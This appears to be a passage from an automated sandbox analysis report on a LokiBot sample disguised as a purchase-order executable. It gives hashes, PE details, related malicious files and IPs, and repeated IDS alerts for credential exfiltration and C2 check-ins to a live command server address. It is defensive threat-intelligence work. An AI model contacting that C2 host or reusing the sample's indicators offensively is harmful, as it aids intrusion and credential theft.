odc-web-geo.onedrive.akadns.net, l-0003.dc-msedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus15.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            08:49:27API Interceptor38x Sleep call for process: PO-A2174679-06.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            UNIFIEDLAYER-AS-1US22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                            • 108.167.156.42
                            CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                            • 192.185.181.49
                            PO.exeGet hashmaliciousBrowse
                            • 192.185.0.218
                            Complaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                            • 192.185.16.95
                            ESCANEAR_FACTURA-20794564552_docx.exeGet hashmaliciousBrowse
                            • 162.214.158.75
                            AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                            • 192.185.46.55
                            iAxkn PDF.exeGet hashmaliciousBrowse
                            • 192.185.100.181
                            carta de pago pdf.exeGet hashmaliciousBrowse
                            • 192.185.5.166
                            PO.exeGet hashmaliciousBrowse
                            • 108.179.232.42
                            payment details.pdf.exeGet hashmaliciousBrowse
                            • 50.87.95.32
                            new order.exeGet hashmaliciousBrowse
                            • 108.179.232.42
                            CV-JOB REQUEST______pdf.exeGet hashmaliciousBrowse
                            • 192.185.181.49
                            RdLlHaxEKP.exeGet hashmaliciousBrowse
                            • 162.214.184.71
                            Drawings2.exeGet hashmaliciousBrowse
                            • 198.57.247.220
                            EFT Remittance.xlsGet hashmaliciousBrowse
                            • 162.241.120.180
                            Remittance Advice.xlsGet hashmaliciousBrowse
                            • 162.241.120.180
                            Complaint_Letter_1212735678-02192021.xlsGet hashmaliciousBrowse
                            • 192.185.17.119
                            Complaint_Letter_1212735678-02192021.xlsGet hashmaliciousBrowse
                            • 192.185.17.119
                            SecuriteInfo.com.BehavesLike.Win32.Generic.ch.exeGet hashmaliciousBrowse
                            • 162.241.194.14
                            SecuriteInfo.com.Trojan.PackedNET.546.1336.exeGet hashmaliciousBrowse
                            • 162.214.184.71

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                            Process:C:\Users\user\Desktop\PO-A2174679-06.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview: 1
                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                            Process:C:\Users\user\Desktop\PO-A2174679-06.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):7379
                            Entropy (8bit):0.6787210715847813
                            Encrypted:false
                            SSDEEP:12:fMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMet:9
                            MD5:DB6D68BC10AB34D28026CA8336B4E986
                            SHA1:7FE6C2D23DC859C0F3C2759679AE97CA6739AC9F
                            SHA-256:E8D86E10D4E8AEA44D547EDB65B18CC175894E362B31152AF38AEA03D9B93DB9
                            SHA-512:DA28A192C54BDD97D81A7D2ECE5B161220B6B7D9DD7C6CDE4F469A8F3EB0161C6A5A0588161377370C89EA9C421AAE396AE0E2BB481C287625A8B31472658D6D
                            Malicious:false
                            Reputation:low
                            Preview: ........................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user..............

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):5.623116556460363
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.15%
                            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:PO-A2174679-06.exe
                            File size:86016
                            MD5:fdec289fb4626dd56bbb55770ae5f432
                            SHA1:1a1f324185e6114fb1362b00f27fe8009a202361
                            SHA256:eb53256b217e27a7ab0f71be2181599a79dc0569dea7fdbc5b32cf96a6bc9109
                            SHA512:59cbf20bc1d2fb24430378ec9fa74107c91a6f491b51e9b04911ecd632cce524d4bd56042df8b3bcd8acd448d984bba6290cffa6739960e188d8c055c0f0b0f4
                            SSDEEP:1536:WafMF8sN5NZilPSBWNBEotYaYUtl8DLogSR:WHF95ilSUNBLtYaYUt7
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....5U................. ... ...............0....@................

                            File Icon

                            Icon Hash:74fae4f6c0c0f98c

                            Static PE Info

                            General

                            Entrypoint:0x4014c0
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                            DLL Characteristics:
                            Time Stamp:0x553582A1 [Mon Apr 20 22:50:09 2015 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:40c19fc273c48bb96f5b0a0c56f8b80b

                            Entrypoint Preview

                            Instruction
                            push 0040BA78h
                            call 00007F0FBCF6F3D5h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            inc eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+2Ah], ch
                            jmp 00007F0FE6D08284h
                            dec ebx
                            wait
                            inc ebx
                            pop es
                            mov esp, eax
                            insb
                            xchg eax, esi
                            pop ebx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax], eax
                            add byte ptr [eax], al
                            dec eax
                            add byte ptr [esi], al
                            inc eax
                            add dword ptr [ecx], 50h
                            jc 00007F0FBCF6F451h
                            push 00000065h
                            arpl word ptr [ebp+esi+00h], si
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4+00000307h], dh
                            add byte ptr [eax], al
                            dec esp
                            xor dword ptr [eax], eax
                            adc al, A1h
                            loop 00007F0FBCF6F407h
                            inc ebx
                            rcr ebp, FFFFFF87h
                            inc ebp
                            popfd
                            pop es
                            sub dh, byte ptr [esi-22h]
                            into
                            out C3h, al
                            imul esp, dword ptr [esi+42A39078h], 47h
                            xchg eax, edx
                            push ss
                            sbb byte ptr [esi], bl
                            and ah, bh
                            mov dl, 3Ah
                            dec edi
                            lodsd
                            xor ebx, dword ptr [ecx-48EE309Ah]
                            or al, 00h
                            stosb
                            add byte ptr [eax-2Dh], ah
                            xchg eax, ebx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jl 00007F0FBCF6F386h
                            add byte ptr [eax], al
                            pop eax
                            mov eax, dword ptr [0E000000h]
                            add byte ptr [eax+4Fh], cl
                            push esi
                            inc ebp
                            inc esp
                            push edx
                            inc ebp
                            inc edi
                            inc ebp
                            dec esp
                            push eax
                            push ebp
                            dec esi
                            push ebx
                            add byte ptr [50000801h], cl

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x11d540x28.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x8d0.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x124.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x112340x12000False0.394232855903data6.11276286566IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .data0x130000xac80x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .rsrc0x140000x8d00x1000False0.12939453125data1.94796497587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            RT_ICON0x143680x568GLS_BINARY_LSB_FIRST
                            RT_GROUP_ICON0x143540x14data
                            RT_VERSION0x140f00x264dataChineseTaiwan

                            Imports

                            DLLImport
                            MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaVarErrI4, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaUI1Str, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                            Version Infos

                            DescriptionData
                            Translation0x0404 0x04b0
                            InternalNameyappingextr
                            FileVersion1.06
                            CompanyNameV.Q. Benney
                            ProductNameProject5
                            ProductVersion1.06
                            FileDescriptionV.Q. Benney
                            OriginalFilenameyappingextr.exe

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            ChineseTaiwan

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            02/23/21-08:49:25.317523TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973280192.168.2.5192.185.78.145
                            02/23/21-08:49:25.317523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.5192.185.78.145
                            02/23/21-08:49:25.317523TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.5192.185.78.145
                            02/23/21-08:49:25.317523TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973280192.168.2.5192.185.78.145
                            02/23/21-08:49:26.296646TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973380192.168.2.5192.185.78.145
                            02/23/21-08:49:26.296646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.5192.185.78.145
                            02/23/21-08:49:26.296646TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.5192.185.78.145
                            02/23/21-08:49:26.296646TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973380192.168.2.5192.185.78.145
                            02/23/21-08:49:27.514702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.5192.185.78.145
                            02/23/21-08:49:27.514702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.5192.185.78.145
                            02/23/21-08:49:27.514702TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.5192.185.78.145
                            02/23/21-08:49:27.514702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.5192.185.78.145
                            02/23/21-08:49:29.621978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.5192.185.78.145
                            02/23/21-08:49:29.621978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.5192.185.78.145
                            02/23/21-08:49:29.621978TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.5192.185.78.145
                            02/23/21-08:49:29.621978TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.5192.185.78.145
                            02/23/21-08:49:31.069635TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.5192.185.78.145
                            02/23/21-08:49:31.069635TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.5192.185.78.145
                            02/23/21-08:49:31.069635TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.5192.185.78.145
                            02/23/21-08:49:31.069635TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.5192.185.78.145
                            02/23/21-08:49:31.953353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.5192.185.78.145
                            02/23/21-08:49:31.953353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.5192.185.78.145
                            02/23/21-08:49:31.953353TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.5192.185.78.145
                            02/23/21-08:49:31.953353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.5192.185.78.145
                            02/23/21-08:49:32.896542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.5192.185.78.145
                            02/23/21-08:49:32.896542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.5192.185.78.145
                            02/23/21-08:49:32.896542TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.5192.185.78.145
                            02/23/21-08:49:32.896542TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.5192.185.78.145
                            02/23/21-08:49:33.755838TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.5192.185.78.145
                            02/23/21-08:49:33.755838TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.5192.185.78.145
                            02/23/21-08:49:33.755838TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.5192.185.78.145
                            02/23/21-08:49:33.755838TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.5192.185.78.145
                            02/23/21-08:49:34.630259TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.5192.185.78.145
                            02/23/21-08:49:34.630259TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.5192.185.78.145
                            02/23/21-08:49:34.630259TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.5192.185.78.145
                            02/23/21-08:49:34.630259TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.5192.185.78.145
                            02/23/21-08:49:35.508751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.5192.185.78.145
                            02/23/21-08:49:35.508751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.5192.185.78.145
                            02/23/21-08:49:35.508751TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.5192.185.78.145
                            02/23/21-08:49:35.508751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.5192.185.78.145
                            02/23/21-08:49:38.359104TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.5192.185.78.145
                            02/23/21-08:49:38.359104TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.5192.185.78.145
                            02/23/21-08:49:38.359104TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.5192.185.78.145
                            02/23/21-08:49:38.359104TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.5192.185.78.145
                            02/23/21-08:49:39.237474TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.5192.185.78.145
                            02/23/21-08:49:39.237474TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.5192.185.78.145
                            02/23/21-08:49:39.237474TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.5192.185.78.145
                            02/23/21-08:49:39.237474TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.5192.185.78.145
                            02/23/21-08:49:40.069118TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.5192.185.78.145
                            02/23/21-08:49:40.069118TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.5192.185.78.145
                            02/23/21-08:49:40.069118TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.5192.185.78.145
                            02/23/21-08:49:40.069118TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.5192.185.78.145
                            02/23/21-08:49:41.025088TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.5192.185.78.145
                            02/23/21-08:49:41.025088TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.5192.185.78.145
                            02/23/21-08:49:41.025088TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.5192.185.78.145
                            02/23/21-08:49:41.025088TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.5192.185.78.145
                            02/23/21-08:49:41.847378TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.5192.185.78.145
                            02/23/21-08:49:41.847378TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.5192.185.78.145
                            02/23/21-08:49:41.847378TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.5192.185.78.145
                            02/23/21-08:49:41.847378TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.5192.185.78.145
                            02/23/21-08:49:42.711982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.5192.185.78.145
                            02/23/21-08:49:42.711982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.5192.185.78.145
                            02/23/21-08:49:42.711982TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.5192.185.78.145
                            02/23/21-08:49:42.711982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.5192.185.78.145
                            02/23/21-08:49:43.540303TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.5192.185.78.145
                            02/23/21-08:49:43.540303TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.5192.185.78.145
                            02/23/21-08:49:43.540303TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.5192.185.78.145
                            02/23/21-08:49:43.540303TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.5192.185.78.145
                            02/23/21-08:49:44.361483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.5192.185.78.145
                            02/23/21-08:49:44.361483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.5192.185.78.145
                            02/23/21-08:49:44.361483TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.5192.185.78.145
                            02/23/21-08:49:44.361483TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.5192.185.78.145
                            02/23/21-08:49:45.281076TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.5192.185.78.145
                            02/23/21-08:49:45.281076TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.5192.185.78.145
                            02/23/21-08:49:45.281076TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.5192.185.78.145
                            02/23/21-08:49:45.281076TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.5192.185.78.145
                            02/23/21-08:49:46.290244TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.5192.185.78.145
                            02/23/21-08:49:46.290244TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.5192.185.78.145
                            02/23/21-08:49:46.290244TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.5192.185.78.145
                            02/23/21-08:49:46.290244TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.5192.185.78.145
                            02/23/21-08:49:47.113450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.5192.185.78.145
                            02/23/21-08:49:47.113450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.5192.185.78.145
                            02/23/21-08:49:47.113450TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.5192.185.78.145
                            02/23/21-08:49:47.113450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.5192.185.78.145
                            02/23/21-08:49:47.991495TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.5192.185.78.145
                            02/23/21-08:49:47.991495TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.5192.185.78.145
                            02/23/21-08:49:47.991495TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.5192.185.78.145
                            02/23/21-08:49:47.991495TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.5192.185.78.145
                            02/23/21-08:49:48.867385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.5192.185.78.145
                            02/23/21-08:49:48.867385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.5192.185.78.145
                            02/23/21-08:49:48.867385TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.5192.185.78.145
                            02/23/21-08:49:48.867385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.5192.185.78.145
                            02/23/21-08:49:49.698286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.5192.185.78.145
                            02/23/21-08:49:49.698286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.5192.185.78.145
                            02/23/21-08:49:49.698286TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.5192.185.78.145
                            02/23/21-08:49:49.698286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.5192.185.78.145
                            02/23/21-08:49:50.602565TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.5192.185.78.145
                            02/23/21-08:49:50.602565TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.5192.185.78.145
                            02/23/21-08:49:50.602565TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.5192.185.78.145
                            02/23/21-08:49:50.602565TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.5192.185.78.145
                            02/23/21-08:49:51.403125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.5192.185.78.145
                            02/23/21-08:49:51.403125TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.5192.185.78.145
                            02/23/21-08:49:51.403125TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.5192.185.78.145
                            02/23/21-08:49:51.403125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.5192.185.78.145
                            02/23/21-08:49:52.189175TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.5192.185.78.145
                            02/23/21-08:49:52.189175TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.5192.185.78.145
                            02/23/21-08:49:52.189175TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.5192.185.78.145
                            02/23/21-08:49:52.189175TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.5192.185.78.145
                            02/23/21-08:49:53.017835TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.5192.185.78.145
                            02/23/21-08:49:53.017835TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.5192.185.78.145
                            02/23/21-08:49:53.017835TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.5192.185.78.145
                            02/23/21-08:49:53.017835TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.5192.185.78.145
                            02/23/21-08:49:53.820833TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.5192.185.78.145
                            02/23/21-08:49:53.820833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.5192.185.78.145
                            02/23/21-08:49:53.820833TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.5192.185.78.145
                            02/23/21-08:49:53.820833TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.5192.185.78.145
                            02/23/21-08:49:54.628473TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.5192.185.78.145
                            02/23/21-08:49:54.628473TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.5192.185.78.145
                            02/23/21-08:49:54.628473TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.5192.185.78.145
                            02/23/21-08:49:54.628473TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.5192.185.78.145
                            02/23/21-08:49:55.479698TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.5192.185.78.145
                            02/23/21-08:49:55.479698TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.5192.185.78.145
                            02/23/21-08:49:55.479698TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.5192.185.78.145
                            02/23/21-08:49:55.479698TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.5192.185.78.145
                            02/23/21-08:49:56.264238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.5192.185.78.145
                            02/23/21-08:49:56.264238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.5192.185.78.145
                            02/23/21-08:49:56.264238TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.5192.185.78.145
                            02/23/21-08:49:56.264238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.5192.185.78.145
                            02/23/21-08:49:57.090884TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.5192.185.78.145
                            02/23/21-08:49:57.090884TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.5192.185.78.145
                            02/23/21-08:49:57.090884TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.5192.185.78.145
                            02/23/21-08:49:57.090884TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.5192.185.78.145
                            02/23/21-08:49:57.912353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.5192.185.78.145
                            02/23/21-08:49:57.912353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.5192.185.78.145
                            02/23/21-08:49:57.912353TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.5192.185.78.145
                            02/23/21-08:49:57.912353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.5192.185.78.145
